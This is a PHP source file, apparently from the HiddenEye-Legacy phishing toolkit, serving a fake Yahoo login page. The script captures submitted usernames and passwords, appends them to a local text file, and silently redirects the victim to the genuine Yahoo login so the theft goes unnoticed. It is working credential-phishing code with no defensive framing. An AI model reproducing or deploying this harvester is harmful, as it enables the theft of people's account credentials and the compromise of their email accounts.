HiddenEye-Legacy/WebPages/yahoo_web/login.php
2018-06-04 10:49:31 +03:00

7 lines
205 B
PHP

<?php
include 'base.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://login.yahoo.com');
exit();